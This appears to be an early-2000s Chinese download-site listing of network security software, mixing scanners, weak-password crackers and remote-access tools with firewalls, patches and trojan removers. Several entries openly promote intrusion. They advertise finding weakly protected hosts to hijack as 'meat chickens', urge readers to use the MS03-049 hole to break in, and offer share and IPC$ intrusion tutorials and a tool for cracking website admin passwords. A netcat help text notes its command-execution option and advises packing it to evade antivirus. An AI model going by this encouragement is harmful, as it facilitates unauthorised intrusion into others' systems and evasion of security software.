LanHelper的中文名为局域网助手，是一款极富个性的不需要客户端的网络工具，具有远程开机，远程关机，远程重启，发送消息，刷新状态等功能。(1)强大的扫描能力，能扫描到计算机的计算机名、工作组名、IP地址、MAC地址、共享文件夹、隐藏共享、共享打印机、共享文件夹是否可写、只读、密码保护等属性、系统(Windows)版本、服务器类型等，而且由于使用了多线程，扫描速度得以大大提高。(2)使用XML保存和显示扫描结果，保存的XML文件即使在没有LanHelper的情况下也可以用浏览器打开，通过样式表的处理成为排序表格，非常方便查看。(3)远程开机，可以给已关闭的计算机发送唤醒命令从而使远程计算机加电启动。(4)远程关机和远程重启功能使系统管理员能够通过网络关闭或者重新启动远程计算机。(5)发送消息功能可以用非常灵活的方式给网络上的用户、计算机、工作组或者局域网发送消息。(6)刷新状态可用于查看在线的计算机，同时检测计算机名或者IP地址是否有改动。

 

Nikto 1.23
著名的且功能强大的WEB扫描工具.

它可以扫描指定主机的WEB类型,主机名,特定目录,COOKIE,特定CGI漏洞,返回主机允许的http模式等等,比如:扫描wendavx,SQlnet.log(包含敏感信息).您可以自己不断增加和修改扫描选项,使之成为功能完备的WEB审计工具( 当入侵扫描工具当然也可以)

啊D网络工具包 1.0
1.　共享资源查找 [为你查找网上的共享资源!]
2.　肉鸡查找 [查找一个网段NT,Win2000密码过于简单的主机]
3.　IP端口扫描 [有针对性的查看整个网段的某个端口,如冰河端口7626]
4.　端口扫描 [使你更加了解对方主机端口的打开状况]
5.　网卡MAC [快速获取一个网段的 用户名、工作组、对方的网卡MAC地址]
6.　网络状态查看 [想知道自己机子打开了什么端口吗?本程序可帮上你的忙!]
7.　主机查询 [想知道IP的的所在地?想知道某地有哪些IP,本程序可帮上你的忙!]
8.　Ping [判断某IP是否和网络连接的好帮手!]
9.　域名<=>IP [想知道域名对应的IP,想知道IP对应的域名,本程序可以帮助你!]
10. 路由查看 [想知道某IP经过的路由?用本程序就可以给你答案!]
11. Finger [Finger能为你查询对方系统的用户信息!]
12. 进程查看 [查看正在运行的软件,查木马还是有一定的帮助的!]
13. 本机IP [在上网的时候,想知道自己的IP吗?本程序可以为你办到!]
14. 常用修改 [反恶意网页修改,恢复系统设置等]

 

蓝雪幻影 1.0
包括端口扫描、自动入侵、信息包攻击、TELNET、拒绝服务 DOS、信使服务 FLOOD、服务器信息、DNS查询等功能，内置的自动模块使得不用输入大量的漏洞信息即可自动进行入侵检测、信息查询，便于使用！

 

Webdav溢出漏洞扫描工具
WebDAV远程缓冲区溢出漏洞扫描工具
针对此漏洞的扫描工具WebDAVScan v1.0，根据原版本对它做了汉化！虽然汉化过程很简单，谁都可以汉化，但为了方便大家使用，我把现成汉化好的提供出来，供大家使用 此软件是个绿色软件，无须安装，直接运行即可！扫描后如有此安全漏洞，软件会自动生成扫描报告！软件非
常小，只有7.23KB。

 

WebDAVScan v1.0
用于检测网段内的Microsoft IIS 5.0 服务器是否提供了对WebDAV的支持。WebDAV（基于 Web 的分布式写作和改写）是一组对 HTTP 协议的扩展，它允许用户协作地编辑和管理远程 Web 服务器上的文件。DAV 功能包含创建、移动、复制及删除远程服务器上的文件和目录。
参考:
http://www.microsoft.com/technet/security/bulletin/MS03-007.asp
http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=4554&keyword=
http://www.ntbugtraq.com/default.asp?sid=1&pid=47&aid=74

 

HTTP代理证专家6.2
HTTP代理证专家，支持代理猎手的格式，BBS上的代理列表可以批量粘贴，每12分钟检验前10名代理并排序，点击每列表头可以排序，保持IP网关不掉线，监视代理难的细节，可放系统托盘……

 

网络肉鸡猎手1.0
测试过了，文件不大在肉鸡上找肉鸡很不错的....

 

Infoscan
一个基于命令行的简单快速的端口扫描器

 

强力共享资源搜索器for Win2000/XP-3.4.2.0
功能：(1)搜索局域网内的所有活动的计算机。
(2)搜索指定的某个计算机的共享资源。
(3)搜索所有计算机的所有共享资源。
(4)搜索任意IP地址段内计算机的共享资源。
(5)打开某个指定的计算机。
(6)得到指定计算机的一些信息。
(7)打开某个指定的共享目录。
(8)给指定的计算机发送消息。
(9)给指定的某个域或者工作组所有的计算机发送消息。
(10)对搜索结果进行排序。
(11)支持插件技术，功能扩展比较简单。
(12)支持网络升级，您将轻松得到最新版本。

 

强力共享资源搜索器forWin9X-1.3.2.0
功能：(1)搜索局域网内的所有活动的计算机。
(2)搜索指定的某个计算机的共享资源。
(3)搜索所有计算机的所有共享资源。
(4)搜索任意IP地址段内计算机的共享资源。
(5)打开某个指定的计算机。
(6)得到指定计算机的一些信息。
(7)打开某个指定的共享目录。
(8)给指定的计算机发送消息。
(9)给指定的某个域或者工作组所有的计算机发送消息。
(10)对搜索结果进行排序。
(11)支持插件技术，功能扩展比较简单。
(12)支持网络升级，您将轻松得到最新版本。

 

Star s Detector 1.0
Star's Detector 1.0
一个检测黑客端口扫描的小小型入侵检测，当然不是真正复杂的那种IDS，可以被动探测操作系统，访问过一些网站就能判断其操作系统，做黑客工具辅助也很好玩的
判断条件：小于1024低权端口连续扫描7次认为扫描，大于1024连续扫描20次则认为是高级扫描

 

极速IP搜索客II (SpeedIP) V1.3
本软件可以根据网络上电脑的IP地址找出机器名和目标主机开启的服务，也可以根据网络上的机器名找出IP地址和目标主机开启的服务。本软件的特色功能是探测出目标主机的操作系统，而且结果十分准确。还可以对主机任意一个端口进行探测（注意！探测选定端口需要选择探测主机服！），端口范围从1到65536，适合有特殊需要的用户使用。由于使用Microsoft Visual Studio .NET——C#编写，本软件可以在所以Windows平台使用，速度快。特别适合在局域网内使用！

 

ipWhere 1.0 注册版
ipWhere 1.0 注册版，这是一款网络服务器位置和所提供服务进行分析的软件，比如提供该服务器属于哪个国家哪个公司联系人相关资料，以及检测服务器是否提供了HTTP/FTP/Telnet/SSH/SMTP/POP3/NetBios/DNS/

Windows Terminal/PC Anywhere Host/MS SQL/MySQL...等服务，功能强大，但使用极其简单。

ipWhere is an Internet host location and services information detection program. It can determine

which country the special IP address or host name belongs to. It can even let you know which

company or organization that IP block belongs to. It can also determine whether many services are

available on that machine, such as WWW, FTP, Telnet, etc. If one service is available, it will

try to get some helpful information about that service and the host.

 

Tunnel finder 1.0
这是一款特殊的代理服务器搜索软件，可以从代理服务器列表中找出支持CONNECT命令的代理服务器，从而帮助

更好的隐藏自己。

 
 

 

Httpb v1.0
命令行获取HTTP banner的扫描程序,速度很快,感觉也比较准确. Written by uhhuhy

 

Server Scan 2002
一个简单的网络扫描器，它能检查你指定网段内的主机正在运行的是什么操作系统，为你的下一步工作进行准备。

 

追捕数据升级包 Build 2002.10.01
追捕数据升级包 Build 2002.10.01，『御风而行』朋友所整理，解压后将wry.dll文件覆盖追捕安装目录中同名文件即可，以及适合于一切使用了追捕数据的软件使用

天眼 1.0.5
运行平台：Windows9x WindowsMe WindowsNt Windows2000
软件用途：被动式系统识别,域名解析,地理位置显示.
简要描述：运行后不用理会此软件,尽管上网到处浏览.你所连接过的站点的IP地址将被记录下来,同时将显示出其域名或主机名,操作系统地理位置等信息.

 

ShareScan 2.45
这是一款扫描 Windows 操作系统共享文件的软件，速度很快...支持局域网扫描和远程扫描。

 

局域网超级工具 2.1.0
软件功能介绍:
(1)搜索局域网内的所有活动的计算机,并将
显示这些计算机的IP地址,所属的域或者工作组.
(2)搜索指定的某个计算机的共享资源.
(3)搜索所有计算机的所有共享资源.
(4)打开某个指定的计算机.
(5)打开某个指定的共享目录.
(6)将某个指定的共享目录映射到本地磁盘(映射网络驱动器).
(7)将搜索到的计算机列表导出到文本文件,一目了然.
(8)将搜索到的共享资源列表导出到文本文件.
(9)搜索SQL Server服务器,将局域网中的所有的活动的
SQL Server服务器搜索出来.
(10)搜索局域网中的所有的打印服务器.
(11)增强功能:将局域网中的所有服务器都搜索出来.
(12)给指定的计算机发送消息.
(13)给指定的某个域或者工作组所有的计算机发送消息.
(14)发送消息时,均可以指定发送的次数(请慎重选择该功能).
(15)在发送消息的时候,均可以选择是否匿名发送,(请慎重选择
该功能).并且可以设置签名档.
(16)搜索局域网上的共享文件.
(17)对搜索结果进行排序.
(18)查询服务器上的用户名信息.
(19)自己设置封面显示文字信息.

 

Tscan 1.1
Tscan 1.1 [For 9X/ME/NT/2000/XP]
对指端口进行搜索,对ftp,http,telnet,finger获取banner,特别是对wu-ftpd以及php的扫描.

 

FtpScan 1.0
FtpScan 1.0 [For 9X/ME/NT/2000/XP]
基于命令行的ftp帐户扫描探测工具。

 

NT-scanner v1.0
NT-scanner v1.0 [For NT/2000/XP]
针对NT/2000的扫描器.可扫描:
NT弱口令,SQL弱口令,port,IIS漏洞,null.printer

 

Scansql 1.50
Scansql 1.50 [For 9X/ME/NT/2000/XP]
Command Line MSSQL Accounts Scanner.
主要是针对Mssql的弱口令用户sa.

 

局域网超级工具 v2.1 注册版
局域网超级工具 v2.1 附注册机。 (1)搜索局域网内的所有活动的计算机,并将显示这些计算机的IP地址,所属的域或者工作组. (2)搜索指定的某个计算机的共享资源. (3)搜索所有计算机的所有共享资源. (4)打开某个指定的计算机. (5)打开某个指定的共享目录. (6)将某个指定的共享目映射到本地磁盘(映射网络驱动器). (7)将搜索到的计算机列表导出到文本文件,一目了然. (8)将搜索到的共享资源列表导出到文本文件. (9)搜索SQL Server服务器,将局域网中的所有的活动的SQL Server服务器搜索出来. (10)搜索局域网中的所有的打印服务器. (11)增强功能:将局域网中的所有服务器都搜索出来. (12)给指定的计算机发送消息. (13)给指定的某个域或者工作组所有的计算机发送消息. (14)发送消息时,均可以指定发送的次数(请慎重选择该功能). (15)在发送消息的时候,均可以选择是否匿名发送,(请慎重选择该功能).

 

Angry IP Scanner v2.09
Angry IP Scanner v2.09是一个相当小的IP扫描软件，不过虽然他的体积小，但功能确一点也不小，可以在最短的时间内扫描远端主机IP的运作状况，并且快速的将结果整理完回报给您知晓。Angry IP Scanner可以扫描的项目也不少，包括了远端主机的名称、目前开启的通联埠以及IP的运作状况等，让您可以完全掌握对方主机的运作状况，对于网管人员来说实在是个不可多得的好帮手呢。Angry IP Scanner可以允许您扫描的范围相当大，只要您不嫌花费的时间比较长，还可以从1.1.1.1一直扫到255.255.255.255，AngryIP Scanner会为您详实的去Ping每个IP，并且将状况回报给您。

 

Winfingerprint v0.5.0
高级远程系统扫描工具，特点如下：WINDOWS操作系统使用SMB查询，枚举SERVER，枚举并测试开放的NetBIOS共享，包括Administrator($)，枚举本地组和全局组，枚举用户，显示活动的服务，TCP/UDP扫描，ICMP扫描，与主机建立IPC$空连接等等。运行环境在Windows NT/2000/XP，包括GUI和命令行两个版本
 
 
Windows 2000 系统漏洞修复 Ver 0.7
Stimulant-Windows 2000 系统漏洞修复 Ver 0.7
主要功能：
1.修复系统默认共享漏洞/关闭445端口/关于系统信使服务/
禁止建立空连接/禁止远程控制注册表/ 等漏洞修复
2.提供自己优化功能，方便加强系统安全
3.支持漏洞扫描。可检测当前系统存已知的漏洞，并提供下载。
4.抵抗DDOS攻击

0.7 更新：
1.修正<漏洞扫描>判断IESP1的错误
2.<漏洞扫描>增加KB828035,KB826232,KB825119,KB824141,KB823559,KB823182扫描。

 

PRCsafe.zip
防PRC病毒安全策略包
现在利用RPC的蠕虫十几种之多，杀毒软件又不能及时的更新，建议使用防PRC病毒安全策略包本策略包禁止了任何远程的ip对您机器的135端口，139端口，445端口，icmp0端口的连接，这样有效的防止了任何变种冲击波病毒的攻击。 为了防止对整个网络的冲击，本策略包禁止ping命令，但可以ping
www.zz.ha.cn 来进行网络测试。
压缩包内含：NT和2000下使用的版本和xp和2003下使用的版本

 

445port.zip
关闭不安全端口445的软件!

 

Windows 2000 Service Pack 4 简体中文版
Windows 2000 Service Pack 4是Windows 2000升级维护包，主要提供了SP2以后微软发布的所有系统升级与补丁,并修正了五百多个BUG。适用于Windows 2000专业版、Windows 2000服务器版、Windows 2000高级服务器版以及带有服务器应用工具包的Windows 2000。

 

瑞星是免费的 2003 v4.20 加强版
有了这个小软件，你的瑞星杀毒软件就永远是最新的了，不用担心用不了，只用担心瑞星不升级，所有功能一应俱全，实在不可多得，甚至还可以直接制作瑞星2003的A盘。

 

cnfupd.zip
我们在浏览远端服务器WEB页面时,如果打开一个包含DOC,PPT等任何驻留在Web站点的Office文档,IE浏览器就会调用相关office工具将其打开,而不提示我们确认,这一情况可能将会带来一些安全隐患或使客户端资源占用极高.

应用这一工具,将会使IE浏览器在处理这些文件时,给我们一提示信息,保证我们可以正确处理文档.

 

sky.bat.rar
Windows2000系统安全漏洞修复批处理工具
修复了以下漏洞
WIN2000默认共享漏洞
禁止了Telnet服务，防止远程开启Ttelnet
禁止了Remote Registry Service服务,防止注册表远程操作
禁止了Messenger服务，防止消息滥发
关闭TCP/IP NetBIOS Helper Service
修改TCP/IP筛选器
提高了抗DDOS攻击的能力

 

Snort 2.0
高性能、高稳定性的轻量型入侵检测系统，适合中小企业应用。

 

反监听密码安全保镖
一般监听密码软件都是利用软件标题来判断是否监听用户按键.如果木马是监视整个键盘可以此软件会失效.
内含delphi 6源代码

 

美萍电脑安全卫士 v10.0 注册版
美萍电脑安全卫士是最实用的网吧，电脑屋，学校机房安全保护，计费管理软件，它利用许多先进的windows内核技术，全真虚拟win9x桌面，实现了硬盘文件保护远程控制，会员远程登陆，限时，定时运行计算机，应用软件选择运行,网站记录，黄色网站限制等多项功能。

 

WinTCPKill
WinTCPKill 是一款TCP连接切断工具，该工具要求能够监听到目标主机的incoming/outgoing连接，如果你处于交换网络的话，可以使用winarp_sk或者winarp_mim等工具来绕过交换特性。
该工具要求WINPCAP库。

 
 

Apache DoS Evasive Maneuvers Module v1.3
Apache DoS Evasive Maneuvers Module 是一款mod_access的替代软件，可以对抗DOS攻击。该软件可以快速拒绝来自相同地址对同一URL的重复请求，这是通过内部一张各子进程的哈希表查询来实现的。

 

主页防火墙 v1.0
此程序是一个主页文件自动检查和恢复的防黑客工具，在指定的时间间隔内检查主页文件是否被非法修改，如主页文件被未授权地修改则立刻使用备份文件更换，切实加强了主页页面的安全性，及时发现和有效制止互联
网络上的非法黑客的违法犯罪行为，保证网络正常有序地运行。

建议将此程序放置于“启动”组里，然后建立一个恢复目录，将需要恢复的文件复制到该目录下，然后运行此程序，自动恢复功能便启动了。

 

网络新手反黑客实用工具箱3.0
《网络新手反黑客实用工具箱3.0》免费软件 编写：tty

只要你上网，就存在安全问题，别幻想说黑客不会光顾你，现在网上陷阱太多。本软件主要为网络新手而编写，分进程查看、本机IP、星号密码、端口扫描、上网密码、反恶意网页、网络状态、端口伪装等八个功能模块
，简单易懂、功能实用、操作简便，非常适合于网络新手使用。
具体使用说明如下： 1、进程查看：所谓进程，就是你计算机里正在运行的程序，点击“刷新”，你就可以查看这些程序，对于怀疑是木马或其他有恶意的程序，你可以点击“删除”终止其运行，非常方便。查看进程是
网络新手学习网络安全的必修之课；
2、本机IP：很多网络新手不知道自己计算机的IP，所以特编写了查自己计算机IP的模块；
3、星号密码：这个功能非常实用。电脑密码一般都以****显示，但有时连自己都忘了这些***号代表什么意思，点击“开始查看”，然后把鼠标移动到有*****密码的地方，这些****号密码就变成真正的密码数字了；
4、端口扫描：如果在网上你的好朋友请你查查他的计算机有没有木马，你就在此处填入他计算机的IP，点击“开始扫描”，那他的计算机开有什么端口都显示出来了，根据他计算机开放的端口，你就可以判断他的计算机有没有木马、有什么木马了。
5、上网密码：可以显示你上网的拨号密码，还可以显示你用IE登陆FPT服务器的密码；
6、反恶意网页：这个功能也非常实用。现在网上很多网页都会修改浏览者的注册表，要么更改你的首页，要么锁住你的注册表编辑器、要么隐藏你的C盘、桌面、开始里的内容等等，非常讨厌。有了此模块，就可以轻松对付了。
7、网络状态：点击“刷新”，就可以看到你的计算机开了什么端口，正在和谁的计算机连接等，对于发现计算机里的木马、后门等有着非常重要的意义；
8、端口伪装：将你的计算机伪装成一个网站或中了木马等，迷惑那些想入侵你的计算机的黑客。当然随便他怎么努力，他是不能真正进入你的计算机的。

 

账号策略终结者2.0版
由于现在很多网站和个人使用Windows NT/2000，对于默认安装的情况下,打过最新补丁的情况下，仍然有许多安全隐患，其中较为明显的存在自动共享与允许匿名连接的问题，别人可以在不需要用户名与密码的情况下，直接就可以获取远程主机的用户列表，以及详细的账号策略，这样对系统安全不利。例如:在C2级安全标准中，显示“最后一次登陆的用户名”是不允许的，因为这样给别人提供了口令攻击的机会，何况列举详细的用户策略，大家可以使用该软件测试一下。本软件可以设置禁止自动共享与匿名连接,以提高系统的安全性。该版本比上一版本提高了若口令测试的能力，增加了端口扫描、安全设置、共享列表。

 

噬菌体密码防盗专家 V4.0
防盗专家不但能够对您的账号进行密码保护,还能实时的诱捕各种隐蔽的病毒、木马、密码间谍、键盘记录、恶意外挂，更能在这些黑客程序发送密码邮件时截获其所使用的邮件帐号、密码！噬菌体密码防盗专家使用先进的内存伪装技术,对内存中的密码框进行动态伪装,让您能够在各种场所都能放心的输入和使用密码，帐号，防止各种盗号，密码被偷，被盗事件的发生。试验中所诱捕的部分木马例子列表:冰河、oicqthief、QQ密码侦探、广外幽灵、边锋盗号机、传奇击键、qqspy、OICQ密码监听记录工具、qeyes潜伏猎手、QQ号码抢劫者、QQ黑暗精灵、QQ杀手、17173外挂木马、in2000密码大盗、Hiddukel爬行动物、阿Q盗密者、凯屋QQ间谍、迷你QQ 、QQ追随者之网吧版、GetQQPasswords、QQ情感往事、QQ 网络潜伏者、ShareQQ、密码专家、传奇在线游戏击键记录、pcGhost-电脑幽灵、超级密码记录木马、联众密码监听器、按键记录器、跟踪者、ef.....

 

Trojan Remover 4.7.3 注册版
Trojan Remover是一个专门用来清除特洛伊木马和自动修复系统文件的工具，能够检查系统登录文件、扫描WIN.INI、SYSTEM.INI和系统登录文件，且扫描完成后会在目录下产生Log信息文件，并帮你自动清除特洛伊木马和修复系统文件，支持在线升级。

 

木马克星(iparmor) V5.36.34 注册版
可以查杀5021种国际木马，112种电子邮件木马，保证查杀冰河类文件关联木马，oicq类寄生木马，icmp类幽灵木马,网络神偷类反弹木马。内置木马防火墙，任何黑客试图与本机建立连接，都需要Iparmor 确认，不仅可以查杀木马，更可以查黑客。

 

江民反黑王 1.0.2.5
为适应互联网时代个人网络安全的需要，江民科技最新推出的个人防火墙软件－反黑王，保障个人上网安全。

反黑王软件的界面风格简单明了，常用的功能都可以方便的进行设置。

 

Whitecell personal firewall
Whitecell personal firewall (Internal test version)此版本的防火墙为个人防火墙，可工作在 Windows 2000/XP 的各个版本上，不可在9x/NT 下运行，目前版本为内部测试版本，支持局域网与拨号用户。本软件适用于普通用户。原本加了很多策略，后经调查发现大多用户需求以简单实用为主。所以去除了繁琐的规则设置。所有功能尽量自动化。随着用户需求，版本升级时会加上些必要的规则。本工具由 Windows 2000 DDK 开发。在驱动层实现包的拦截。无需安装，启动后即可使用。功能： 可以阻拦发向本机的所有TCP,ICMP包，对别的包可以进行监测但没有进行拦截。用户无需配置。可自由浏览网站，收发E - MAIL等操作。

 

Whitecell Secruity Tools 0.9
文件、目录、进程保护工具，本工具由 WINDOWS 2000 DDK 开发，在系统0层实现对用户指定文件（目录）的防读取/更改/删除等操作，达到了系统级的保护功能、实现文件/目录/进程的内核级隐藏功能。因为没有用到IFS DDK，不是文件过滤驱动，所以核心模块与 Filemon 的实现方法截然不同。

 

ADMINPAK Beta 3
微软工具包adminpak，为进一步方便系统管理员的工作，微软日前发布了一个专为系统管理员设计的管理工具包。这一工具包提供了大量的远程管理工具，使管理员足不出户就可以用Windows XP对Windows 2000计算机进行控制。这一工具现在还处于Beta 3版阶段，更详细的内容请参见微软知识库Q304718文档。

 

SecureIIS 1.24 注册版
SecureIIS 是由eeye安全公司出品的一个应用级防火墙，基于CHAM技术可以保护IIS免受各种已知或未知的攻击。这是其最新1.24版，修正了许可协议计算部分对双字节操作系统的支持，这解决了当SecureIIS在日文、韩文和中文操作系统上运行出现的许可协议授权Key无法通过验证的问题。

 

Antiy Ghostbusters 3.03 20020312 6244
Antiy Labs出品的专业级特洛伊木马检测工具，被网友称为“捉鬼队”。该软件可以对驱动器、内存进程和目录进行扫描，准确检测并彻底清除对用户系统存在安全威胁的程序，如Trojan（木马），Backdoor（后门），keylog（键盘记录程序）包括那些开放后门的各种蠕虫程序等等。软件内置一个强大的监控器，可以对文件和敏感区进行监控，随时发现活动的木马。网络应用监控器跟踪所有应用程序的网络行为，使他们的网络通讯全部依照用户设定的规则，对于不在用户以往设定的规则之内的通讯行为，会弹出提示让用户选择拒绝或者放行，软件自动将用户操作，记录到规则集中，用户可以方便的对网络规则进行管理。Antiy Ghostbusters内置了多个实用的安全工具，让用户可以对启动加载项、共享目录、任务、进程、服务等进行管理，可以察看网络连接状态，端口进程关联信息，可以恢复恶意网页对IE设置的修改。便于用户对系统进行管理。

 

超级兔子IE保护器 V2.2
超级兔子IE保护器 V2.2，能清除所有IE的修改，包括：标题、首页、右键菜单、工具按钮、自动弹出的网页、注册表编辑器、开始菜单，而且还可以即时保护注册表免受修改，自动清除所有网页的攻击。新功能：禁止IE弹出广告窗口、更多网页的攻击...

 

HFNetChk 3.31
Microsoft Network Security Hotfix Checker (HFNetChk) version 3.31 微软公布为Win-NT, 2K, IIS, SQL

的补丁扫描软件，它是一个基于命令行的工具，能扫描所有在一个区域网络内所有的使用NT和2k的机器，并将他们现在所装的补丁和现有最新的补丁相比较，使得管理员更加简单确认和修补有漏洞的机器。 这个程序是由微软的安全程序经理Eric Schultze设计，且由Shavlik Technologies完成的。它涵盖了Win NT/2000/XP；
IIS4.0和5.0；SQL服务器7.0和2000（包括微软数据引擎）；IE5.01及其后继版本。 这个工具访问了一个XML文件，并自动下载，这个文件包含了以下的信息：在各个补丁的文件和他们的文件版本，他们的总结，使用补丁之后的注册键，补丁代替其他版本的信息，相似的微软信息基础号码及相似的信息。 如果任何在被扫描机器上的文件和注册细节和在XML文件的信息不符的，相关的安全补丁就被认为是没有安装，并且这个信息就被显示在屏幕上。相关的版本号也被显示了。 这个程序还能用来确定扫描计算机的的具体种类，输出格式，引擎速度，检查类型，XML文件所在的地址及类似的信息，这是据完全的用法说明所说，这个说明应该在晚些时间在由微软公布。 平台：Win NT/2000/XP

 

SWF Clear
对付Flash病毒的补丁工具。
　　自第一个攻击Flash文件的病毒首次出现以来，Macromedia公司就开始着手开发修补此病毒的工具软件。本周三，该公司已成功发布了一款能修补SWF/LFM-926病毒的工具软件SWF Clear Utility，希望能帮助用户防范Flash病毒的骚扰。

　　据Macromedia公司的产品经理Troy Evans称，新开发的修补工具SWF Clear Utility（SWF清除工具），对

Windows注册表作了一些修改，使得系统不再能识别Shockwave Flash的MIME类型。这样安装了Flash播放器的用户就可免受SWF/LFM-926病毒的攻击。他指出，其他的大部分的互联网用户是不会受到该新发现的Flash病毒的攻击，因为他们只在Web浏览器中运行Flash文件。

　　为此，Evans解释到，当Flash文件从浏览器的插件中启动后，无法使用一个由Flash的ActionScript所支持的脚本语言所编写的特殊命令FScommand:exec，这样SWF/LFM-926病毒就无法借助该命令去感染用户机器上的

Flash文件。

　　当运行了SWF Clear Utility软件后，任何用户无论下载或通过邮件收到带毒Flash文件后，如果不用播放器重新连接.SWF文件，病毒都无法从其桌面上运行。

　　但病毒专家们称，希望Macromedia公司要继续开发修补病毒的工具，因为恶意代码编写者已编写了一个新的极为有力的攻击方式。据本周二发现Flash病毒的反病毒公司Sophos的发言人称：“Macromedia公司其实还未完全修补漏洞，他们只不过让最终用户在使用Flash文件时比以前感染该新病毒更难一些而已。

　　另外，一家专门追踪电脑病毒的国际组织WildList的首席执行官 Shane Coursen也称，Macromedia开发的修补工具，只不过是一个开始，仍要继续努力，采取进一步的措施来限制病毒作者利用Flash的ActionScript进

行作乱。

 

UnPnP
XP即插即用漏洞专修程序 Windows XP的通用即插即用功能存在严重的安全漏洞，这一漏洞允许黑客对Windows XP系统发动恶性攻击。近日，一名国外程序员编制了一个专门用来对付这一漏洞的专修工具。这一工具除了可以关/启用即插即用功能服务外，还可以停止/启动其他一些与此有关的系统自启服务。

 

MCAFEE FIREWALL v3.0 零售版
McAfee Firewall是著名的McAfee公司的一个出色的个人防火墙软件，它可以保护你免受来自Internet的黑客和木马程序等攻击。（这个版本全面支持WINXP！）

 

Microsoft Windows Script 5.6
微软最新的Microsoft Windows Script 5.6，防止IE标题被改的补丁，目前可以预防：混客绝情炸弹；会在你启动组里做手脚，使得重启以后标题依旧；禁止你的注册表，改首页，主页地址栏变灰，改右键； OE标题栏修改...内含For Win9X/NT和For Win2000两版本。

 

NoHTML v1.2.0.0
该工具软件可以有效防止现有几种电子邮件病毒的破坏，可使outlook 2000和outlook 2002自动把所有基于html格式的电子邮件转换成无害的text格式或者是rtf格式。html是网页的一种格式，html语言和****语言等常被用在html格式的电子邮件中以执行某些操作。因此，outlook 的用户就可能面临着html格式带来的潜在威胁，因为某些恶意html格式的电子邮件可能会利用outlook中内嵌ie浏览器的安全漏洞而造成破坏。把nohtml安装到outlook下的一个附加目录，该工具就可自动把接收到的html文件转换成text格式或者rtf格式。

outlook2002接收到的html格式邮件也是如此。另外，邮件到达收件箱后并不立即进行转换。只有当用户选择了某邮件时，转换操作才会生效。但是，该工具对outlook98和outlook express内的网页邮件不起作用。
 
 
 

如果要密码就是
www.77169.com

ms03049入侵动画 +工具下载
现在利用是很高的漏洞,
50% 都能入侵...
快点入侵搞点肉机呀!!

 

nc中文版
[v1.10 NT] edit by Meteor
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [options] [hostname] [port]
options:
-d 后台模式运行@!

-e prog 程序重定向，一旦连接，就执行 [危险!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 帮助信息
-i secs 扫描端口时的延时的间隔
-l 监听模式,等待连接
-L 连接关闭后,仍然继续监听
-n 指定数字的IP地址，不能用hostname
-o file 十六进制模式输出文件,三段
-p port 本地端口
-r 任意指定本地及远程端口
-s addr 本地源地址
-t timeout的时间
-u UDP 模式
-v 详细输出 [-vv,详细输出]
-w secs timeout for connects and final net reads
-z 将输入输出关掉——用于扫描时
port numbers can be individual or ranges: m-n [inclusive]

ncl中文版,感谢兄弟Meteor汉化,
大家压缩软件,压缩一下,杀毒软件是查不出来的.

 

电影任我下--下载在线电影教程+工具下载
下载之后,有工具下载,和动画教学,

 

共享入侵动画教学
今天，我们学习用共享入侵！最基础，也是最简单，但成功率很高，

共享主机

　　所谓的共享主机就是在计算机里有共享的硬盘，文件夹或是打印机等共享项目。

　　只在安装了网卡的计算机上才可以设置共享，如网吧 公司里的局域网和一些人自己连的对等网。个人可以在我的电脑里在硬盘上点激鼠标右键来看看是否有共享这一项，如果有则可以在里面对自己的共享进行设置。
　　共享的设置可以分为只读（可以对硬盘文件进行读取但无法删除或是上载） 完全（可以读取 删除
上载等操作）需要密码访问（对上面的两种操作分别来设置密码）。

 

 

快速得到肉鸡动画教学
注意：win98系统不能进行入侵！改2000系统吧，
今天我们学习主要的win系统入侵手法，
他是共享入侵的另一种（默认共享）IPC$
这也是网络中很重要的入侵手法！

 

 

 

破解黄色网站动画[第2集]+工具=推荐 黄金眼 V1.1
破解“金梅电影”那套程序的管理员名和密码的东东，在google上搜索了下，随便找了两个站，结果都进去了screen.width-366)this.width=screen.width-366" border=0>，
因为得到的管理员权限，所以请网友们进去不要搞破坏，有电影看就行了。

hotfixchk.vbs
检查本地或者远程Windows服务器是否安装相应补丁

帮助:
D:/WMI>cscript hotfixchk.vbs
Must provide a hotfix id as a named argument:
hotfixchk /Q:Q327194 or hotfixchk /Q:KB823980

D:/WMI>hotfixchk.vbs 10.10.3.25 /Q:Q327194
[Q327194]
;computername = hotfixinstallcount
10.10.3.25 = 1 '1表示该补丁已安装,0表示为安装该补丁

 

Niloo IIS Security Scanner 1.0
NISS v1.0，这是一款MS Webserver 漏洞扫描器，可以扫描多达750种IIS 4.0/5.0 漏洞。详细命令行和故障排除，请注意解压包中的readme.txt 文件说明。

 

STAT Scanner Professional Edition
v5.14 build 1507
STAT Scanner Professional Edition v5.14 build 1507零售版
Harris Corporation 出品的网络安全扫描工具，管理员可以用来检测服务器安全漏洞，内包含全面的详细的安

全漏洞资料，支持Windows、Sun Solaris、Unix、RedHat、Mandrake Linux 等系统漏洞检测...提供详细的扫描报告供管理员查看。需要Microsoft Data Access Component (MDAC) 2.5 或更高版本支持。

 

NessusWX 1.4.4
这是Nessus运行在WIN32平台上的远程安全扫描软件。它是多线程、基于插入式的软件，拥有很好的GTK界面，能够完成超过1200项的远程安全检查，具有强大的报告输出能力，可以产生HTML、XML、LaTeX和ASCII文本等格式的安全报告，并且会为每一个发现的安全问题提出解决建议，最好的开放源代码风险评估工具之一。

 

Nessus 2.0.6a
这是一款不错的自由的最新的基于UNIX,Linux, BSD, Solaris 和其他一些系统上的远程安全扫描工具,基于GPL发布,源代码开放并且可自由地修改后再发布，可扩展性强!需要GTK 1.2以上版本支持！
压缩包内有新手指南，大家可以看看。

 

HScan v1.20
多线程方式对指定IP段(指定主机),或主机列表进行检测.GUI和命令行两种方式.
扫描项目:
-name --- 获取主机名;
-port --- 默认端口扫描;
-ftp --- FTP Banner,匿名用户,弱口令账号扫描;
-ssh --- SSH Banner扫描;
-telnet --- TELNET Banner,弱口令账号扫描;
-smtp --- SMTP Banner,匿名用户,弱口令账号扫描;
-finger --- FINGER漏洞(SunOS/Solaris 用户列表扫描);
-iis --- IIS漏洞扫描;
-cgi --- Unix/NT cgi漏洞扫描;
-pop --- POP3 Banner,弱口令账号扫描;
-rpc --- RPC漏洞扫描;
-ipc --- Windows NT/2000用户列表获取,弱口令账号扫描;
-imap --- IMAP Banner,弱口令账号扫描;
-mssql --- MSSQL弱口令账号扫描;
-mysql --- MYSQL Version,弱口令账号扫描;
-cisco --- CISCO弱口令扫描;
